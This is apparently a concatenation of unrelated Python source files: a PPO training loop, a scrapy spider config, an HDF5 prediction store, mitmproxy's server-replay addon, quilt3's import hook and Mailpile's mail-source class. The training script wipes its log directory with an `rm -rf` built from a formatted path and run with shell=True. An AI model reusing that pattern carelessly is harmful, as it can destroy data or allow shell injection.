else:
agent = evkit.rl.algo.PPO(actor_critic,
cfg['learner']['clip_param'],
cfg['learner']['ppo_epoch'],
cfg['learner']['num_mini_batch'],
cfg['learner']['value_loss_coef'],
cfg['learner']['entropy_coef'],
lr=cfg['learner']['lr'],
eps=cfg['learner']['eps'],
max_grad_norm=cfg['learner']['max_grad_norm'])
start_epoch = 0
# Machinery for storing rollouts
num_train_processes = cfg['env']['num_processes'] - cfg['env']['num_val_processes']
num_val_processes = cfg['env']['num_val_processes']
assert cfg['env']['num_val_processes'] < cfg['env']['num_processes'], "Can't train without some training processes!"
current_obs = StackedSensorDictStorage(cfg['env']['num_processes'], cfg['learner']['num_stack'], retained_obs_shape)
current_train_obs = StackedSensorDictStorage(num_train_processes, cfg['learner']['num_stack'], retained_obs_shape)
logger.debug(f'Stacked obs shape {current_obs.obs_shape}')
if cfg['learner']['use_replay']:
rollouts = RolloutSensorDictReplayBuffer(
cfg['learner']['num_steps'],
num_train_processes,
current_obs.obs_shape,
action_space,
cfg['learner']['internal_state_size'],
actor_critic,
cfg['learner']['use_gae'],
cfg['learner']['gamma'],
cfg['learner']['tau'],
cfg['learner']['replay_buffer_size'])
else:
rollouts = RolloutSensorDictStorage(
cfg['learner']['num_steps'],
num_train_processes,
current_obs.obs_shape,
action_space,
cfg['learner']['internal_state_size'])
# Set up logging
if cfg['saving']['logging_type'] == 'visdom':
mlog = tnt.logger.VisdomMeterLogger(
title=uuid, env=uuid,
server=cfg['saving']['visdom_server'],
port=cfg['saving']['visdom_port'],
log_to_filename=cfg['saving']['visdom_log_file'])
elif cfg['saving']['logging_type'] == 'tensorboard':
mlog = tnt.logger.TensorboardMeterLogger(
env=uuid,
log_dir=cfg['saving']['log_dir'],
plotstylecombined=True)
else:
            raise NotImplementedError(f"Unknown logger type: ({cfg['saving']['logging_type']})")
# Add metrics and logging to TB/Visdom
loggable_metrics = ['metrics/rewards',
'diagnostics/dist_perplexity',
'diagnostics/lengths',
'diagnostics/max_importance_weight',
'diagnostics/value',
'losses/action_loss',
'losses/dist_entropy',
'losses/value_loss']
core_metrics = ['metrics/rewards', 'diagnostics/lengths']
debug_metrics = ['debug/input_images']
if 'habitat' in cfg['env']['env_name'].lower():
for metric in ['metrics/spl', 'metrics/success']:
loggable_metrics.append(metric)
core_metrics.append(metric)
for meter in loggable_metrics:
mlog.add_meter(meter, tnt.meter.ValueSummaryMeter())
for debug_meter in debug_metrics:
mlog.add_meter(debug_meter, tnt.meter.SingletonMeter(), ptype='image')
mlog.add_meter('config', tnt.meter.SingletonMeter(), ptype='text')
mlog.update_meter(cfg_to_md(cfg, uuid), meters={'config'}, phase='train')
# File loggers
flog = tnt.logger.FileLogger(cfg['saving']['results_log_file'], overwrite=True)
reward_only_flog = tnt.logger.FileLogger(cfg['saving']['reward_log_file'], overwrite=True)
# replay data to mlog, move metadata file
if changed_log_dir:
evkit.utils.logging.replay_logs(existing_log_paths, mlog)
evkit.utils.logging.move_metadata_file(old_log_dir, cfg['saving']['log_dir'], uuid)
##########
# LEARN! #
##########
if cfg['training']['cuda']:
current_train_obs = current_train_obs.cuda()
current_obs = current_obs.cuda()
rollouts.cuda()
actor_critic.cuda()
# These variables are used to compute average rewards for all processes.
episode_rewards = torch.zeros([cfg['env']['num_processes'], 1])
episode_lengths = torch.zeros([cfg['env']['num_processes'], 1])
# First observation
obs = envs.reset()
current_obs.insert(obs)
mask_done = torch.FloatTensor([[0.0] for _ in range(cfg['env']['num_processes'])]).pin_memory()
states = torch.zeros(cfg['env']['num_processes'], cfg['learner']['internal_state_size']).pin_memory()
# Main loop
start_time = time.time()
num_updates = int(cfg['training']['num_frames']) // ( cfg['learner']['num_steps'] * cfg['env']['num_processes'] )
logger.info(f"Running until num updates == {num_updates}")
for j in range(start_epoch, num_updates, 1):
for step in range(cfg['learner']['num_steps']):
obs_unpacked = {k: current_obs.peek()[k].peek() for k in current_obs.peek()}
if j == start_epoch and step < 10:
log_input_images(obs_unpacked, mlog, num_stack=cfg['learner']['num_stack'],
key_names=['rgb_filled', 'map'], meter_name='debug/input_images', step_num=step)
# Sample actions
with torch.no_grad():
value, action, action_log_prob, states = actor_critic.act(
obs_unpacked,
states.cuda(),
mask_done.cuda())
cpu_actions = list(action.squeeze(1).cpu().numpy())
obs, reward, done, info = envs.step(cpu_actions)
reward = torch.from_numpy(np.expand_dims(np.stack(reward), 1)).float()
# Handle terminated episodes; logging values and computing the "done" mask
episode_rewards += reward
episode_lengths += (1 + cfg['env']['additional_repeat_count'])
mask_done = torch.FloatTensor([[0.0] if done_ else [1.0] for done_ in done])
for i, (r, l, done_) in enumerate(zip(episode_rewards, episode_lengths, done)): # Logging loop
if done_:
phase = 'train' if i < num_train_processes else 'val'
mlog.update_meter(r, meters={'metrics/rewards'}, phase=phase)
mlog.update_meter(l, meters={'diagnostics/lengths'}, phase=phase)
if 'habitat' in cfg['env']['env_name'].lower():
mlog.update_meter(info[i]["spl"], meters={'metrics/spl'}, phase=phase)
mlog.update_meter(np.ceil(info[i]["spl"]), meters={'metrics/success'}, phase=phase)
episode_rewards *= mask_done
episode_lengths *= mask_done
# Insert the new observation into RolloutStorage
if cfg['training']['cuda']:
mask_done = mask_done.cuda()
for k in obs:
if k in current_train_obs.sensor_names:
current_train_obs[k].insert(obs[k][:num_train_processes], mask_done[:num_train_processes])
current_obs.insert(obs, mask_done)
rollouts.insert(current_train_obs.peek(),
states[:num_train_processes],
action[:num_train_processes],
action_log_prob[:num_train_processes],
value[:num_train_processes],
reward[:num_train_processes],
mask_done[:num_train_processes])
mlog.update_meter(value[:num_train_processes].mean().item(), meters={'diagnostics/value'}, phase='train')
# Training update
if not cfg['learner']['test']:
if not cfg['learner']['use_replay']:
# Moderate compute saving optimization (if no replay buffer):
# Estimate future-discounted returns only once
with torch.no_grad():
next_value = actor_critic.get_value(rollouts.observations.at(-1),
rollouts.states[-1],
rollouts.masks[-1]).detach()
rollouts.compute_returns(next_value, cfg['learner']['use_gae'], cfg['learner']['gamma'], cfg['learner']['tau'])
value_loss, action_loss, dist_entropy, max_importance_weight, info = agent.update(rollouts)
rollouts.after_update() # For the next iter: initial obs <- current observation
# Update meters with latest training info
mlog.update_meter(dist_entropy, meters={'losses/dist_entropy'})
mlog.update_meter(np.exp(dist_entropy), meters={'diagnostics/dist_perplexity'})
mlog.update_meter(value_loss, meters={'losses/value_loss'})
mlog.update_meter(action_loss, meters={'losses/action_loss'})
mlog.update_meter(max_importance_weight, meters={'diagnostics/max_importance_weight'})
# Main logging
if (j) % cfg['saving']['log_interval'] == 0:
n_steps_since_logging = cfg['saving']['log_interval'] * num_train_processes * cfg['learner']['num_steps']
total_num_steps = (j + 1) * num_train_processes * cfg['learner']['num_steps']
logger.info("Update {}, num timesteps {}, FPS {}".format(
j + 1,
total_num_steps,
int(n_steps_since_logging / (time.time() - start_time))
))
for metric in core_metrics: # Log to stdout
for mode in ['train', 'val']:
if metric in core_metrics or mode == 'train':
mlog.print_meter(mode, total_num_steps, meterlist={metric})
for mode in ['train', 'val']: # Log to files
results = mlog.peek_meter(phase=mode)
reward_only_flog.log(mode, {metric: results[metric] for metric in core_metrics})
if mode == 'train':
results['step_num'] = j + 1
flog.log('all_results', results)
mlog.reset_meter(total_num_steps, mode=mode)
start_time = time.time()
# Save checkpoint
if j % cfg['saving']['save_interval'] == 0:
save_dir_absolute = os.path.join(cfg['saving']['log_dir'], cfg['saving']['save_dir'])
save_checkpoint(
{ 'agent': agent, 'epoch': j },
save_dir_absolute, j)
# Clean up (either after ending normally or early [e.g. from a KeyboardInterrupt])
finally:
try:
if isinstance(envs, list):
[env.close() for env in envs]
else:
envs.close()
logger.info("Killed envs.")
except UnboundLocalError:
logger.info("No envs to kill!")
if is_interactive() and __name__ == '__main__':
assert LOG_DIR, 'log dir cannot be empty'
os.makedirs(LOG_DIR, exist_ok=True)
subprocess.call("rm -rf {}/*".format(LOG_DIR), shell=True)
ex.observers.append(FileStorageObserverWithExUuid.create(LOG_DIR))
ex.run_commandline(
'run_config with \
uuid="gibson_random" \
cfg.env.num_processes=1\
'.format())
elif __name__ == '__main__':
assert LOG_DIR, 'log dir cannot be empty'
os.makedirs(LOG_DIR, exist_ok=True)
subprocess.call("rm -rf {}/*".format(LOG_DIR), shell=True)
ex.observers.append(FileStorageObserverWithExUuid.create(LOG_DIR))
try:
ex.run_commandline()
except FileNotFoundError as e:
logger.error(f'File not found! Are you trying to test an experiment with the uuid: {e}?')
raise e
else:
logger.info(__name__)
| 53.687204
| 292
| 0.561441
|
78ffc8df031b65a3c88707db240e56f67bfff2d0
| 979
|
py
|
Python
|
scraper/storage_spiders/aothun24hvn.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | null | null | null |
scraper/storage_spiders/aothun24hvn.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 10
|
2020-02-11T23:34:28.000Z
|
2022-03-11T23:16:12.000Z
|
scraper/storage_spiders/aothun24hvn.py
|
chongiadung/choinho
|
d2a216fe7a5064d73cdee3e928a7beef7f511fd1
|
[
"MIT"
] | 3
|
2018-08-05T14:54:25.000Z
|
2021-06-07T01:49:59.000Z
|
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//span[@id='ctl00_MainContent_ProductDetail1_lblProductName']",
'price' : "//span[@class='price color_red']",
'category' : "",
'description' : "//div[@id='content']/div[@class='content_ct']/div/span",
'images' : "//img[@id='ctl00_MainContent_ProductDetail1_imgPro']/@src",
'canonical' : "",
'base_url' : "",
'brand' : "",
'in_stock' : "",
'guarantee' : "",
'promotion' : ""
}
name = 'aothun24h.vn'
allowed_domains = ['aothun24h.vn']
start_urls = ['http://aothun24h.vn']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = ['']
rules = [
Rule(LinkExtractor(allow=['/chi-tiet-san-pham/']), 'parse_item'),
Rule(LinkExtractor(allow=['/san-pham/']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
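# Editor's sketch (hypothetical helper -- the real Spider subclass is assembled
# elsewhere by generator.py from the variables above): how the XPATH map is
# typically consumed to pull raw product fields out of a downloaded page.
def extract_fields(response):
    """Return a dict of raw extracted values keyed by the field names in XPATH."""
    return {field: response.xpath(xp).extract() if xp else None
            for field, xp in XPATH.items()}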
| 32.633333
| 77
| 0.640449
|
6c6c15b177918a6ddf8234e579d02cd1547b5b8f
| 3,363
|
py
|
Python
|
pepper_snp/modules/python/DataStorePredict.py
|
Samteymoori/pepper
|
734d226de47a855952e3b58145c1fcfbe221d3b4
|
[
"MIT"
] | null | null | null |
pepper_snp/modules/python/DataStorePredict.py
|
Samteymoori/pepper
|
734d226de47a855952e3b58145c1fcfbe221d3b4
|
[
"MIT"
] | null | null | null |
pepper_snp/modules/python/DataStorePredict.py
|
Samteymoori/pepper
|
734d226de47a855952e3b58145c1fcfbe221d3b4
|
[
"MIT"
] | null | null | null |
import h5py
import yaml
import numpy as np
class DataStore(object):
    """Class to read/write a FRIDAY prediction file."""
_prediction_path_ = 'predictions'
_groups_ = ('position', 'index', 'bases', 'rles')
def __init__(self, filename, mode='r'):
self.filename = filename
self.mode = mode
self._sample_keys = set()
self.file_handler = h5py.File(self.filename, self.mode)
self._meta = None
    def __enter__(self):
        return self

    def __exit__(self, *args):
        if self.mode != 'r' and self._meta is not None:
            self._write_metadata(self.meta)
        self.file_handler.close()
def _write_metadata(self, data):
"""Save a data structure to file within a yml str."""
for group, d in data.items():
if group in self.file_handler:
del self.file_handler[group]
self.file_handler[group] = yaml.dump(d)
def _load_metadata(self, groups=None):
"""Load meta data"""
if groups is None:
groups = self._groups_
return {g: yaml.load(self.file_handler[g][()]) for g in groups if g in self.file_handler}
@property
def meta(self):
if self._meta is None:
self._meta = self._load_metadata()
return self._meta
def update_meta(self, meta):
"""Update metadata"""
self._meta = self.meta
self._meta.update(meta)
def write_prediction(self, contig, contig_start, contig_end, chunk_id, position, index, predicted_bases, ref_seq):
chunk_name_prefix = str(contig) + "-" + str(contig_start.item()) + "-" + str(contig_end.item())
chunk_name_suffix = str(chunk_id.item())
name = contig + chunk_name_prefix + chunk_name_suffix
if 'predictions' not in self.meta:
self.meta['predictions'] = set()
if 'predictions_contig' not in self.meta:
self.meta['predictions_contig'] = set()
if chunk_name_prefix not in self.meta['predictions_contig']:
self.meta['predictions_contig'].add(chunk_name_prefix)
self.file_handler['{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix, 'contig_start')] \
= contig_start.item()
self.file_handler['{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix, 'contig_end')] \
= contig_end.item()
if name not in self.meta['predictions']:
self.meta['predictions'].add(name)
self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
chunk_name_suffix, 'position')] = np.array(position, dtype=np.int32)
self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
chunk_name_suffix, 'index')] = np.array(index, dtype=np.int32)
# self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
# chunk_name_suffix, 'ref_seq')] = np.array(ref_seq, dtype=np.uint8)
self.file_handler['{}/{}/{}/{}/{}'.format(self._prediction_path_, contig, chunk_name_prefix,
chunk_name_suffix, 'bases')] = predicted_bases.astype(np.int32)
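# Editor's usage sketch (hypothetical file name and toy arrays, not part of the
# original module): writing a single prediction chunk through DataStore.
if __name__ == '__main__':
    positions = np.arange(10, dtype=np.int64)
    indices = np.zeros(10, dtype=np.int64)
    bases = np.zeros(10, dtype=np.int64)
    with DataStore('example_predictions.hdf5', mode='w') as store:
        store.write_prediction('chr20',
                               np.int64(0), np.int64(1000), np.int64(0),
                               positions, indices, bases, ref_seq=None)
    # on exit, the accumulated metadata is dumped as YAML and the HDF5 handle closed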
| 42.56962
| 122
| 0.585787
|
20fcfc2a1f3b6aef0b88a0a2600ea6daecfdcb4c
| 4,980
|
py
|
Python
|
mitmproxy/addons/serverplayback.py
|
00cool/project-X
|
a76988a07311a6e9706197d1ca5c7c5961cfaf9a
|
[
"MIT"
] | null | null | null |
mitmproxy/addons/serverplayback.py
|
00cool/project-X
|
a76988a07311a6e9706197d1ca5c7c5961cfaf9a
|
[
"MIT"
] | 1
|
2021-05-11T20:51:11.000Z
|
2021-05-11T20:51:11.000Z
|
mitmproxy/addons/serverplayback.py
|
00cool/project-X
|
a76988a07311a6e9706197d1ca5c7c5961cfaf9a
|
[
"MIT"
] | null | null | null |
import hashlib
import urllib
import typing
from typing import Any # noqa
from typing import List # noqa
from mitmproxy import ctx
from mitmproxy import flow
from mitmproxy import exceptions
from mitmproxy import io
from mitmproxy import command
import mitmproxy.types
class ServerPlayback:
def __init__(self):
self.flowmap = {}
self.stop = False
self.final_flow = None
self.configured = False
@command.command("replay.server")
def load_flows(self, flows: typing.Sequence[flow.Flow]) -> None:
"""
Replay server responses from flows.
"""
self.flowmap = {}
for i in flows:
if i.response: # type: ignore
l = self.flowmap.setdefault(self._hash(i), [])
l.append(i)
ctx.master.addons.trigger("update", [])
@command.command("replay.server.file")
def load_file(self, path: mitmproxy.types.Path) -> None:
try:
flows = io.read_flows_from_paths([path])
except exceptions.FlowReadException as e:
raise exceptions.CommandError(str(e))
self.load_flows(flows)
@command.command("replay.server.stop")
def clear(self) -> None:
"""
Stop server replay.
"""
self.flowmap = {}
ctx.master.addons.trigger("update", [])
def count(self):
return sum([len(i) for i in self.flowmap.values()])
def _hash(self, flow):
"""
Calculates a loose hash of the flow request.
"""
r = flow.request
_, _, path, _, query, _ = urllib.parse.urlparse(r.url)
queriesArray = urllib.parse.parse_qsl(query, keep_blank_values=True)
key = [str(r.port), str(r.scheme), str(r.method), str(path)] # type: List[Any]
if not ctx.options.server_replay_ignore_content:
if ctx.options.server_replay_ignore_payload_params and r.multipart_form:
key.extend(
(k, v)
for k, v in r.multipart_form.items(multi=True)
if k.decode(errors="replace") not in ctx.options.server_replay_ignore_payload_params
)
elif ctx.options.server_replay_ignore_payload_params and r.urlencoded_form:
key.extend(
(k, v)
for k, v in r.urlencoded_form.items(multi=True)
if k not in ctx.options.server_replay_ignore_payload_params
)
else:
key.append(str(r.raw_content))
if not ctx.options.server_replay_ignore_host:
key.append(r.host)
filtered = []
ignore_params = ctx.options.server_replay_ignore_params or []
for p in queriesArray:
if p[0] not in ignore_params:
filtered.append(p)
for p in filtered:
key.append(p[0])
key.append(p[1])
if ctx.options.server_replay_use_headers:
headers = []
for i in ctx.options.server_replay_use_headers:
v = r.headers.get(i)
headers.append((i, v))
key.append(headers)
return hashlib.sha256(
repr(key).encode("utf8", "surrogateescape")
).digest()
def next_flow(self, request):
"""
Returns the next flow object, or None if no matching flow was
found.
"""
hsh = self._hash(request)
if hsh in self.flowmap:
if ctx.options.server_replay_nopop:
return self.flowmap[hsh][0]
else:
ret = self.flowmap[hsh].pop(0)
if not self.flowmap[hsh]:
del self.flowmap[hsh]
return ret
def configure(self, updated):
if not self.configured and ctx.options.server_replay:
self.configured = True
try:
flows = io.read_flows_from_paths(ctx.options.server_replay)
except exceptions.FlowReadException as e:
raise exceptions.OptionsError(str(e))
self.load_flows(flows)
def tick(self):
if self.stop and not self.final_flow.live:
ctx.master.addons.trigger("processing_complete")
def request(self, f):
if self.flowmap:
rflow = self.next_flow(f)
if rflow:
response = rflow.response.copy()
response.is_replay = True
if ctx.options.refresh_server_playback:
response.refresh()
f.response = response
if not self.flowmap:
self.final_flow = f
self.stop = True
elif ctx.options.replay_kill_extra:
ctx.log.warn(
"server_playback: killed non-replay request {}".format(
f.request.url
)
)
f.reply.kill()
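# Editor's usage sketch (hypothetical flow-file path; requires a running mitmproxy
# master, so shown as comments only): the addon is normally driven through
# mitmproxy commands.
#
#   addon = ServerPlayback()
#   addon.load_file("recorded_flows.mitm")   # the replay.server.file command
#   addon.count()                            # number of replayable responses left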
| 33.648649
| 104
| 0.554618
|
0a2e706551d61595debabb4ac0707dcd03e52f61
| 2,741
|
py
|
Python
|
api/python/quilt3/imports.py
|
fiskus/quilt
|
a5945a111a3065ecd23e64d069aa67e42492c5f2
|
[
"Apache-2.0"
] | null | null | null |
api/python/quilt3/imports.py
|
fiskus/quilt
|
a5945a111a3065ecd23e64d069aa67e42492c5f2
|
[
"Apache-2.0"
] | null | null | null |
api/python/quilt3/imports.py
|
fiskus/quilt
|
a5945a111a3065ecd23e64d069aa67e42492c5f2
|
[
"Apache-2.0"
] | null | null | null |
"""Implementation of the Python Quilt data package loader."""
from importlib.machinery import ModuleSpec
import sys
from quilt3 import Package
from .backends import get_package_registry
MODULE_PATH = []
class DataPackageImporter:
"""
Data package module loader. Executes package import code and adds the package to the
module cache.
"""
@classmethod
def create_module(cls, spec): # pylint: disable=unused-argument
"""
Module creator. Returning None causes Python to use the default module creator.
"""
return None
@classmethod
def exec_module(cls, module):
"""
Module executor.
"""
name_parts = module.__name__.split('.')
if module.__name__ == 'quilt3.data':
# __path__ must be set even if the package is virtual. Since __path__ will be
# scanned by all other finders preceding this one in sys.meta_path order, make sure
# it points to someplace lacking importable objects
module.__path__ = MODULE_PATH
return module
elif len(name_parts) == 3: # e.g. module.__name__ == quilt3.data.foo
namespace = name_parts[2]
# we do not know the name the user will ask for, so populate all valid names
registry = get_package_registry()
for pkg in registry.list_packages():
pkg_user, pkg_name = pkg.split('/')
if pkg_user == namespace:
module.__dict__[pkg_name] = Package._browse(pkg, registry=registry)
module.__path__ = MODULE_PATH
return module
else:
assert False
# pylint: disable=too-few-public-methods
class DataPackageFinder:
"""
Data package module loader finder. This class sits on `sys.meta_path` and returns the
loader it knows for a given path, if it knows a compatible loader.
"""
@classmethod
def find_spec(cls, fullname, path=None, target=None): # pylint: disable=unused-argument
"""
        This function is what gets executed by the loader.
"""
# an implementation for subpackage imports exists, but this has significant
# consistency issues. For now let's avoid, but you can see the full code at
# https://github.com/ResidentMario/package-autorelaod/blob/master/loader.py
name_parts = fullname.split('.')
if name_parts[:2] != ['quilt3', 'data'] or len(name_parts) > 3:
return None
else:
return ModuleSpec(fullname, DataPackageImporter())
def start_data_package_loader():
"""
Adds the data package loader to the module loaders.
"""
sys.meta_path.append(DataPackageFinder())
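# Editor's usage sketch (hypothetical namespace/package names; assumes the local
# registry already contains an 'examples/somepkg' package, so shown as comments):
#
#   start_data_package_loader()
#   from quilt3.data.examples import somepkg   # Package._browse('examples/somepkg')
#   somepkg["data.csv"]                        # entries behave like quilt3 Package keys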
| 33.426829
| 95
| 0.639548
|
27a865939eb4c676aeb0638fd80ef8d72fab8217
| 32,263
|
py
|
Python
|
mailpile/mail_source/__init__.py
|
pall-valmundsson/Mailpile
|
6f2544860f64e53f4231358f3f63669b5f1134ed
|
[
"Apache-2.0"
] | null | null | null |
mailpile/mail_source/__init__.py
|
pall-valmundsson/Mailpile
|
6f2544860f64e53f4231358f3f63669b5f1134ed
|
[
"Apache-2.0"
] | null | null | null |
mailpile/mail_source/__init__.py
|
pall-valmundsson/Mailpile
|
6f2544860f64e53f4231358f3f63669b5f1134ed
|
[
"Apache-2.0"
] | null | null | null |
import os
import random
import re
import thread
import threading
import traceback
import time
import mailpile.util
from mailpile.eventlog import Event
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import *
from mailpile.mailutils import FormatMbxId
from mailpile.util import *
__all__ = ['mbox', 'maildir', 'imap']
class BaseMailSource(threading.Thread):
"""
MailSources take care of managing a group of mailboxes, synchronizing
the source with Mailpile's local metadata and/or caches.
"""
DEFAULT_JITTER = 15 # Fudge factor to tame thundering herds
SAVE_STATE_INTERVAL = 3600 # How frequently we pickle our state
INTERNAL_ERROR_SLEEP = 900 # Pause time on error, in seconds
RESCAN_BATCH_SIZE = 250 # Index at most this many new e-mails at once
MAX_MAILBOXES = 100 # Max number of mailboxes we add
MAX_PATHS = 5000 # Abort if asked to scan too many directories
# This is a helper for the events.
__classname__ = 'mailpile.mail_source.BaseMailSource'
def __init__(self, session, my_config):
threading.Thread.__init__(self)
self.daemon = mailpile.util.TESTING
self._lock = MSrcRLock()
self.my_config = my_config
self.name = my_config.name
self.session = session
self.alive = None
self.event = None
self.jitter = self.DEFAULT_JITTER
self._state = 'Idle'
self._sleeping = None
self._interrupt = None
self._rescanning = False
self._rescan_waiters = []
self._loop_count = 0
self._last_rescan_count = 0
self._last_rescan_completed = False
self._last_rescan_failed = False
self._last_saved = time.time() # Saving right away would be silly
def __str__(self):
rv = ': '.join([threading.Thread.__str__(self), self._state])
if self._sleeping > 0:
rv += '(%s)' % self._sleeping
return rv
def _pfn(self):
return 'mail-source.%s' % self.my_config._key
def _load_state(self):
with self._lock:
config, my_config = self.session.config, self.my_config
events = list(config.event_log.incomplete(source=self,
data_id=my_config._key))
if events:
self.event = events[0]
else:
self.event = config.event_log.log(
source=self,
flags=Event.RUNNING,
message=_('Starting up'),
data={'id': my_config._key})
if 'counters' not in self.event.data:
self.event.data['counters'] = {}
for c in ('copied_messages',
'indexed_messages',
'unknown_policies'):
if c not in self.event.data['counters']:
self.event.data['counters'][c] = 0
def _save_state(self):
self.session.config.event_log.log_event(self.event)
def _save_config(self):
self.session.config.save_worker.add_unique_task(
self.session, 'Save config', self.session.config.save)
def _log_status(self, message):
self.event.message = message
self.session.config.event_log.log_event(self.event)
self.session.ui.mark(message)
if 'sources' in self.session.config.sys.debug:
self.session.ui.debug('%s: %s' % (self, message))
def open(self):
"""Open mailboxes or connect to the remote mail source."""
        raise NotImplementedError('Please override open in %s' % self)
def close(self):
"""Close mailboxes or disconnect from the remote mail source."""
        raise NotImplementedError('Please override close in %s' % self)
def _has_mailbox_changed(self, mbx, state):
"""For the default sync_mail routine, report if mailbox changed."""
        raise NotImplementedError('Please override _has_mailbox_changed in %s'
                                  % self)
def _mark_mailbox_rescanned(self, mbx, state):
"""For the default sync_mail routine, note mailbox was rescanned."""
        raise NotImplementedError('Please override _mark_mailbox_rescanned in %s'
                                  % self)
def _path(self, mbx):
if mbx.path.startswith('@'):
return self.session.config.sys.mailbox[mbx.path[1:]]
else:
return mbx.path
def _check_interrupt(self, clear=True):
if mailpile.util.QUITTING or self._interrupt:
if clear:
self._log_status(_('Interrupted: %s')
% (self._interrupt or _('Quitting')))
self._interrupt = None
return True
else:
return False
def _sorted_mailboxes(self):
mailboxes = self.my_config.mailbox.values()
mailboxes.sort(key=lambda m: ('inbox' in m.name.lower() and 1 or 2,
'sent' in m.name.lower() and 1 or 2,
m.name))
return mailboxes
def sync_mail(self):
"""Iterates through all the mailboxes and scans if necessary."""
config = self.session.config
self._last_rescan_count = rescanned = errors = 0
self._last_rescan_completed = True
self._last_rescan_failed = False
self._interrupt = None
batch = self.RESCAN_BATCH_SIZE
errors = rescanned = 0
ostate = self._state
for mbx_cfg in self._sorted_mailboxes():
try:
with self._lock:
mbx_key = FormatMbxId(mbx_cfg._key)
path = self._path(mbx_cfg)
if (path in ('/dev/null', '', None)
or mbx_cfg.policy in ('ignore', 'unknown')):
continue
# Generally speaking, we only rescan if a mailbox looks like
# it has changed. However, 1/50th of the time we take a look
# anyway just in case looks are deceiving.
state = {}
if batch > 0 and (self._has_mailbox_changed(mbx_cfg, state) or
random.randint(0, 50) == 10):
self._state = 'Waiting... (rescan)'
if self._check_interrupt(clear=False):
self._last_rescan_completed = False
break
count = self.rescan_mailbox(mbx_key, mbx_cfg, path,
stop_after=batch)
if count >= 0:
self.event.data['counters'
]['indexed_messages'] += count
batch -= count
complete = ((count == 0 or batch > 0) and
not self._interrupt and
not mailpile.util.QUITTING)
if complete:
rescanned += 1
# If there was a copy, check if it completed
if not self.event.data.get('copying',
{'complete': True}
).get('complete'):
complete = False
# If there was a rescan, check if it completed
if not self.event.data.get('rescan',
{'complete': True}
).get('complete'):
complete = False
# OK, everything looks complete, mark it!
if complete:
self._mark_mailbox_rescanned(mbx_cfg, state)
else:
self._last_rescan_completed = False
else:
self._last_rescan_failed = True
self._last_rescan_completed = False
errors += 1
except (NoSuchMailboxError, IOError, OSError):
self._last_rescan_failed = True
errors += 1
except:
self._last_rescan_failed = True
self._log_status(_('Internal error'))
raise
self._state = 'Waiting... (disco)'
discovered = 0
if not self._check_interrupt():
discovered = self.discover_mailboxes()
status = []
if discovered > 0:
status.append(_('Discovered %d mailboxes') % discovered)
if discovered < 1 or rescanned > 0:
status.append(_('Rescanned %d mailboxes') % rescanned)
if errors:
status.append(_('Failed to rescan %d') % errors)
self._log_status(', '.join(status))
self._last_rescan_count = rescanned
self._state = ostate
return rescanned
def _jitter(self, seconds):
return seconds + random.randint(0, self.jitter)
def _sleep(self, seconds):
if self._sleeping != 0:
self._sleeping = seconds
while (self.alive and self._sleeping > 0 and
not mailpile.util.QUITTING):
time.sleep(min(1, self._sleeping))
self._sleeping -= 1
self._sleeping = None
play_nice_with_threads()
return (self.alive and not mailpile.util.QUITTING)
def _existing_mailboxes(self):
return set(self.session.config.sys.mailbox +
[mbx_cfg.local
for mbx_cfg in self.my_config.mailbox.values()
if mbx_cfg.local])
def _update_unknown_state(self):
have_unknown = 0
for mailbox in self.my_config.mailbox.values():
if mailbox.policy == 'unknown':
have_unknown += 1
self.event.data['counters']['unknown_policies'] = have_unknown
self.event.data['have_unknown'] = (have_unknown > 0)
def discover_mailboxes(self, paths=None):
config = self.session.config
self._log_status(_('Checking for new mailboxes'))
ostate, self._state = self._state, 'Discovery'
try:
existing = self._existing_mailboxes()
max_mailboxes = self.MAX_MAILBOXES - len(existing)
adding = []
paths = (paths or self.my_config.discovery.paths)[:]
while paths:
raw_fn = paths.pop(0)
fn = os.path.normpath(os.path.expanduser(raw_fn))
fn = os.path.abspath(fn)
if not os.path.exists(fn):
continue
if (raw_fn not in existing and
fn not in existing and
fn not in adding):
if self.is_mailbox(fn):
adding.append(fn)
if len(adding) > max_mailboxes:
break
if os.path.isdir(fn):
try:
for f in [f for f in os.listdir(fn)
if f not in ('.', '..')]:
nfn = os.path.join(fn, f)
if (len(paths) <= self.MAX_PATHS and
os.path.isdir(nfn)):
paths.append(nfn)
elif self.is_mailbox(nfn):
paths.append(nfn)
except OSError:
pass
if len(adding) > max_mailboxes:
break
new = {}
for path in adding:
new[config.sys.mailbox.append(path)] = path
for mailbox_idx in new.keys():
mbx_cfg = self.take_over_mailbox(mailbox_idx, save=False)
if mbx_cfg.policy != 'unknown':
del new[mailbox_idx]
if adding:
self._save_config()
return len(adding)
finally:
self._state = ostate
def take_over_mailbox(self, mailbox_idx, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery # Stayin' alive! Stayin' alive!
with self._lock:
mailbox_idx = FormatMbxId(mailbox_idx)
self.my_config.mailbox[mailbox_idx] = {
'path': '@%s' % mailbox_idx,
'policy': disco_cfg.policy,
'process_new': disco_cfg.process_new,
}
mbx_cfg = self.my_config.mailbox[mailbox_idx]
mbx_cfg.apply_tags.extend(disco_cfg.apply_tags)
mbx_cfg.name = self._mailbox_name(self._path(mbx_cfg))
if disco_cfg.guess_tags:
self._guess_tags(mbx_cfg)
self._create_primary_tag(mbx_cfg, save=False)
self._create_local_mailbox(mbx_cfg, save=False)
if save:
self._save_config()
return mbx_cfg
def _guess_tags(self, mbx_cfg):
if not mbx_cfg.name:
return
name = mbx_cfg.name.lower()
tags = set(mbx_cfg.apply_tags)
for tagtype in ('inbox', 'drafts', 'sent', 'spam'):
for tag in self.session.config.get_tags(type=tagtype):
if (tag.name.lower() in name or
_(tag.name).lower() in name):
tags.add(tag._key)
mbx_cfg.apply_tags = sorted(list(tags))
